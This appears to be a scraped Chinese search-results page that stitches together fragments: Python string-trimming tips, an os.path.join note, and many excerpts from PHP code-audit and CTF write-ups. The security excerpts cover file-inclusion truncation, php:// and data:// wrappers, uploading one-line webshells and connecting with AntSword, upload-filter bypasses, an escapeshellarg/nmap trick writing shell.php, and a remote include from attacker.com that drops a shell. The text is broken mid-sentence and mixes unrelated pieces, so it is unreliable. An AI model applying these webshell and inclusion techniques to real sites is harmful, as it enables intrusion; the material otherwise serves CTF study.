文本数据操作和处理可以从使用 Python 程序中受益,该程序将从字符串中消除最后一个指定的字符。...在 Python 中,我们有一些字符串内置函数,如 rstrip(),可以从字符串中删除最后一个指定的字符。切片技术是从末尾删除字符的更简单方法。...然后使用名为 rstrip() 的内置函数删除字符串的最后一个字符,并将其存储在变量 trim_last_char 中。最后,借助变量trim_last_char打印结果。...然后初始化变量mod_str,通过删除最后一个字符来存储值。is_str[:-1]:-1 表示反向模式下的字符串,“:”从末尾切一个字符。最后,我们在变量mod_str的帮助下打印变量。...然后将最后指定的字符存储在变量last_suffix中。然后使用 if 语句使用 endswith() 检查最后一个指定字符的条件。
今天实习公司分配了一个数据处理的任务。...在将列表中的字符串连接成一个长路径时,我遇到了如下问题: import os path_list = ['first_directory', 'second_directory', 'file.txt...这我就纳闷了: ['first_directory', 'second_directory', 'file.txt'] 细思后想明白了,os.path.join 的输入必须是一个或多个 str ,而不能是...字符串列表的本质依然是list。指令把 字符串列表 理解成了一个 str ,就相当于对 单str 进行 os.path.join ,最后当然没变化啦。 ...(path_list) head = '' for path in path_list: head = os.path.join(head, path) print head 终于将列表中的字符串连接成了一个完整的长路径
在很多情况下,我们都面临着需要确定字符串中第一个和最后一个数字的位置的问题,这可能是为了提取包围在这两个边界内的子字符串。...本文寻找的是如何通过确定字符串中的第一个和最后一个数字来提取出子字符串的一种通用解决方案,而不管分隔符是什么、有多少,并且不需要执行替换操作。...然而,找到一种等效的用于确定字符串中最后一个数字的结构并不容易,能够实现这一点是关键。...construction]由两个单独的子句进行减法运算,其中一个是字符串内第一个数字的位置,另一个是最后一个数字的位置。...和25分别代表字符串中第一个和最后一个数字的位置。
0x00 简介 ---- 之前看了seay写的PHP代码审计的书,全部浏览了一遍,作为一个代码审计小白,希望向一些和我一样的小白的人提供一下我的收获,以及一个整体的框架和常见漏洞函数。...看配置文件,带有config关键字的文件,找到mysql.class.php文件的connect()函数,查看在数据库连接时是否出现漏洞。...(2) 远程文件包含: 前提条件:allow_url_include = on 出现频率不如本地包含 (3) 文件包含截断: %00截断(php版本小于5.3) 问号截断(问号后面相当于请求的参数,伪截断...> 所在路径就会出现一个1.txt 里面的内容为命令执行后的结果 (2) 反引号命令执行: echo whoami; 直接就可以执行命令 双引号和单引号的区别: $a = 1 echo " $a "...> (2)字符串问题: 利用报错,找到敏感信息 字符串截断: %00空字符截断:【PHP版本小于5.3】 <?
或者有类似关键字的文件 看配置文件,带有config关键字的文件,找到mysql.class.php文件的connect()函数,查看在数据库连接时是否出现漏洞 继续跟读首页文件index.php,了解程序运作时调用了哪些函数和文件以...> 远程文件包含 前提条件:allow_url_include = on 出现频率不如本地包含 文件包含截断 %00截断(php版本小于5.3) 问号截断(问号后面相当于请求的参数,伪截断) 英文(....> 所在路径就会出现一个1.txt 里面的内容为命令执行后的结果 反引号命令执行 echo whoami; 直接就可以执行命令 双引号和单引号的区别 $a = 1 echo "$a" = output...三等于是type和value的双重比较,相比之下更加安全 账户体系中的越权问题 水平越权:A用户能够以B用户的身份,进行B用户的全部权限操作。...> 字符串问题 利用报错,找到敏感信息 字符串截断 %00空字符截断:【PHP版本小于5.3】 #!php <?
,这样以确保能够直接将一个字符串传入shell函数,并且还是确保安全的。...escapeshellcmd【http://php.net/manual/zh/function.escapeshellcmd.php】 对字符串中可能会欺骗shell命令执行任意命令的字符进行转义。...一个简单结论 对于单个单引号,escapeshellarg函数转义后,还会在被转义字符的左右字符串各加一个单引号进行连接,而escapeshellcmd函数是直接转义。...> -oN shell.php ' 第一次先经过escapeshellarg函数,先对左右两边的单引号进行转义,然后分别对原单引号即现在斜杆加单引号的左右两边再次加上单引号进行字符串连接,得到如下字符串...且这里有一个文件包含,后缀会添加php。 然后由于doc和zip的文件头一样,因此构造一句话木马打包后,Burpsuite抓包修改后缀名和Mime类型上传,最后使用zip伪协议读取即可。 ?
,这个等级的上传完全没有限制,所以随便上传一个php木马就可以连接。...使用蚁剑连接成功: ? 让.php木马文件改为.jpg文件使用BurpSuite修改文件名绕过: ? 让3.jpg改为3.php同样可以绕过 ? 得到文件路径,蚁剑连接即可。...上传muma.php.jpg文件,16进制00截断: ? 可以看到对应的文件名所在行的16进制.jpg小数点所对应的16进制字符为2e,修改为00即可: ?...,start) 查找find字符在string字符中的最后一次出现的位置,start参数可选,表示指定从哪里开始 substr(string,start,length) 返回string字符中从start...,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型和一个可以用于普通 HTML 文件中 IMG 标记中的
为了使代码更灵活,将被包含的文件设置为变量用来进行动态调用。这就导致客户端可以调用一个恶意文件,造成文件包含漏洞。文件包含漏洞在php中居多。...当在php中创建了一个对象后,可以通过serialize()函数把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。测试代码如下; <?...1 表示有一个值 {s:4:"test";s:3:"123";}中, s 表示字符串 4 表示该字符串的长度, "test" 为字符串的名称 "123"...③注意点 各个伪协议适用php版本不尽相同,以下实验环境php版本在5.2~5.7之间疯狂来回切换,到最后已经无法总结各协议实验成功所使用的php版本。...为了防止直接在URL连接中的一些敏感字符被waf检测拦截,可将攻击代码进行base64编码。 #文件包含代码: <?php include $_GET['file']?
当按照某一格式输出时,遇到第一个非本格式的字符就会自动截断后面的字符。测试代码: <?...可以看到,当检测到第一个不属于%d类型的空格时,就会自动地去进行截断。所以从程序员的角度来讲,很容易忘记对%d输入的数据进行强制的类型转换,因为即使不手动转换,程序也能正常运行。...;最后的为数据类型 s表示字符串,d表示整数测试代码: 其中\'的作用与'是一样的,这里因为是单引号包裹的字符串,所以需要对字符串中的单引号进行转义 ?...最后一种模式会吞掉单引号后面的两个字符,同样导致单引号溢出 未知类型吞噬斜杠 %d为整数,%s为字符串,但%y是没有规定的格式。
2、内容速览 1、什么是文件包含 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。.../etc/passwd.html',而这个文件显然是不存在,这就需要截断,有以下几种截断方式: 1、%00截断 用0字节(\x00)将作为字符串结束符,截断$filename变量之后的字符串 例如: http...> 利用方式 构造一个文件http://www.attacker.com/echo.txt 代码如下: 再发包即可生成一个shell.php文件,然后使用蚁剑连接 file:// 读取文件内容 通过file协议可以访问本地文件系统,读取到文件的内容 data:// 读取文件 数据流封装器,和php...文件,然后蚁剑连接 phar:// 针对压缩包 php解压缩包的一个函数,不管后缀是什么,都会当做压缩包来解压,需要将一句话木马文件打包成zip压缩宝,然后将后缀改成png等其它格式 zip:// 针对压缩包
; }else{ echo "Hello.Geeker"; } strpos($path,'..')函数是返回匹配的字符串的首位置,这里是个简单waf。...这里将file的data写入到path中去,如果没有就新建一个 但是这里需要getshell,需要考虑怎么写入一句话,需要构造一个有webshell的页面,然后可以将这个页面写入到新的php页面中,大体思路是这样...各种截断字符串: %09,%0a,%0b,%0c 15. , 可以使用的关键词 1. select 2. from 3. or 4. ' 5. () 6....以及不含关键词的mysql自带函数,很容易看得出是一个盲注,没了空格的话可以使用括号来代替。...提示不能上传php文件,但是可以上传PHP,不过这里纯粹验证上传的文件名,然后 这里是路径,两者是直接连接的,然后可以 后面就是截断的问题了,不要老想着00截断,有的时候可能其他的截断,然后简单fuzz
{flag_admiaanaaaaaaaaaaa} md5 collision 源码中可以看出 变量a经过get方式传递 ,a的值不等于QNKCDZO 但a的只经过md5加密后等于 QNKCDZO加密后的值...} php decode 给出代码 大体意思是,声明一个函数 把接收到的ZzvSWE变量的值 进行base64解密后 再次进行gzinflate加密 之后遍历每个字符 的ascii的值 -1最后在转化为字符串...mac下安装了集成环境 把代码copy一下放到网站目录 打开后发现什么都不显示 分析一下代码倒数第二行的eval eval是把任何字符串当做php代码来执行 而php代码是不能在前台显示出来的 (自己是这样理解...不知道对不对) eval换成echo即可 文件包含 这题用到php伪协议的知识 自己对这块不怎么了解 有时间要总结一下php伪协议的知识。...> post接收pass参数用strcmp函数与pass1做比较 php的strcmp函数不能处理数组所以 nctf{strcmp_is_n0t_3afe} 密码重置 打开解题连接后观察url user1
; }else{ echo "Hello.Geeker"; } strpos($path,'..')函数是返回匹配的字符串的首位置,这里是个简单waf。...但是这里需要getshell,需要考虑怎么写入一句话,需要构造一个有webshell的页面,然后可以将这个页面写入到新的php页面中,大体思路是这样,然后这里可以利用ssrf原理,让它构建出一个含有一句话的页面...各种截断字符串: %09,%0a,%0b,%0c 15. , 可以使用的关键词 1. select 2. from 3. or 4. ' 5. () 6. 以及不含关键词的mysql自带函数,很容易看得出是一个盲注...0x07简单的文件上传 这道题的思路挺好的,涨姿势了。 ? 提示不能上传php文件,但是可以上传PHP,不过这里纯粹验证上传的文件名,然后 ? 这里是路径,两者是直接连接的,然后可以 ?...后面就是截断的问题了,不要老想着00截断,有的时候可能其他的截断,然后简单fuzz一下就OK, 使用脚本 file = open("fuzz.txt",'w') for i in range(256):
php黑魔法,是以前做CTF时遇到并记录的,很适合在做CTF代码审计的时候翻翻看看。...当输入的两个值为不是字符串时就会产生不预期的返回值: 比如 这样一段代码中,输入password[]=1则返回success,成功绕过验证 三、当有两个is_numeric判断并用and连接时,and后面的...五、Eregi匹配 数组绕过 ereg是处理字符串,传入数组之后,ereg是返回NULL %00截断绕过 http://www.secbox.cn/hacker/1889.html 六、接收参数$a得存在...php $a=$_GET['a']; if ($a==0) { echo "1"; } if ($a) { echo "must"; } 七、接收参数中不能出现某一字符,但下面又必须使用可以php://...==1);//true 科学计数法 .1e1 echo $b[‘.1e1’]//输出t .是字符串所以在数组里面变成0,但在is_numeric中有点则正常输出为数字 十一、当switch没有break
1、%00 截断 能利用 00 截断的场景现在应该很少了 PHP 内核是由 C 语言实现的,因此使用了 C 语言中的一些字符串处理函数。在连接字符串时,0 字节 (\x00) 将作为字符串的结束符。...所以在这个地方,攻击者只要在最后加入一个 0 字节,就能截断 file 变量之后的字符串。 ?file=../../../../../../../../....../" 的方式即可构造出超长目录字符串: 4、点号截断: ?file=../../../../../../../../.....a=2.txt%00 即可执行 2.txt 中 phpinfo 的代码 列子二 漏洞文件 index.php <?phpif (empty($_GET["file"])){ echo('.....有一个条件那就是 php 版本小于 5.3.10 我们的代码依旧不变 漏洞文件 index.php <?phpif (empty($_GET["file"])){ echo('..
filename=helloworld&type=bash 中文输出乱码问题 很多使用中文输出的程序,在shell中,中文可能会出现编码问题。...将字符集设置为中文utf8,这个语句可以放到bash_profile中,启时自动设置。 export LANG="zh_CN.UTF-8" 如果还有乱码,需要注意下终端程序的编码设置。...for i in `ls /root`;do echo $i;done 如何解决空格被截断的问题 比如类似上面的文本,for循环时,会将空格也截断。...=($x) #字符串转数组 echo 直接输出数组,${array} #打印第一个 echo 数组元素,${array[2]} echo 数组所有内容,${array[*]} #注意,用这个方式传参时...数组的下标,用@或者*是有区别的,如果是*时,加上双引号就会变成字符串,@则不会。
Google一下了解函数的缺陷吧! 按照题目给的提示:“/x00” 发现ereg函数存在截断漏洞:%xx截断遇到%00则默认字符串结束;而strpos函数则越过或是说识别%00截断后面的字符内容。...; } }else{ echo "please input pass!"; } 题目给出了源码;分析一波…… strcmp():比较两个字符串,且大小写敏感; str1第一个字符串。...“合法字符串”,如果传入的是非法的字符串则返回 return 0 既然指导了函数比较的缺陷,那么我们就传入一个不合法的字符串,比如数组…… php为了可以上传一个数组,会把上传的变量结尾带一对中括号当作数组上传...查看到最后一个sm.txt(本CMS说明)页面的时候发现了新大陆!...echo $nctf; }--> 从源码提示来看:要求我们包含的文件中的内容是“meizijiu”,并用file_get_contents()函数读取 这里需要引用的技术就是php协议:php
rand() 在linux下,PHP的rand函数是调用glibc库中的rand函数,其实现是有缺陷的。...或 PHP_URL_FRAGMENT 的其中一个来获取 URL 中指定的部分的 string。...如果subject是一个数组, preg_replace()返回一个数组,其他情况下返回一个字符串。 webshell代码 <?...';", $file); $file = preg_replace('|\$option=\'.*\';|', $c, $file); echo $file; 这里面有一个疑问,运行的结果如下 aaa\...关于phpinfo() https://zeroyu.xyz/2018/11/13/what-phpinfo-can-tell-we/ 关于00绕过 0x00 为16进制的截断字符 %00 经过url解码之后为截断字符
> 常见的文件包含函数 PHP:include、require、include_once、require_once等 include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行 require.../etc/passwd.html',而这个文件显然是不存在 这就需要截断,有以下几种 1、%00截断 用0字节(\x00)将作为字符串结束符 截断$filename变量之后的字符串 例子 http://...> 利用方式 构造一个文件http://www.attacker.com/echo.txt 代码如下: <?php fputs(fopen("shell.php","w"),"<?...page=http://www.attacker.com/echo.txt 将会在目标网络的index.php所在的目录下生成shell.php,内容为: <?...元封装器,设计用于”数据流打开”时的”筛选过滤”应用 本地磁盘文件进行读取 有一些敏感信息会保存在php文件中,如果我们直接利用文件包含去打开一个php文件,php代码是不会显示在页面上的 这时候我们可以以
3.截断绕过规则 在php版本小于5.3.4的服务器中,当 Magic_quote_gpc 选项为off时,可以在文件名中使用%00截断,所以可以把上传文件命名为hack.php%00.png。...可以看到,包中的文件类型为image/png,可以通过文件类型检查。 ? 上传成功。 ? 而服务器会认为其文件名为hack.php,顺势解析为php文件。...> 分析: strrpos(string,find,start) 函数返回字符串find在另一字符串string中最后一次出现的位置,如果没有找到字符串则返回false,可选参数start规定在何处开始搜索...可以看到,High级别的代码读取文件名中最后一个”.”后的字符串,期望通过文件名来限制文件类型,因此要求上传文件名形式必是”.jpg”、”.jpeg” 、”*.png”之一。...首先利用copy将一句话木马文件php.php与图片文件1.jpg合并 ? ? 生成一个hack.jpeg ? 打开可以看到,一句话木马藏到了最后。 ? 顺利通过文件头检查,可以成功上传。 ?
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
实时音视频
对象存储
即时通信 IM
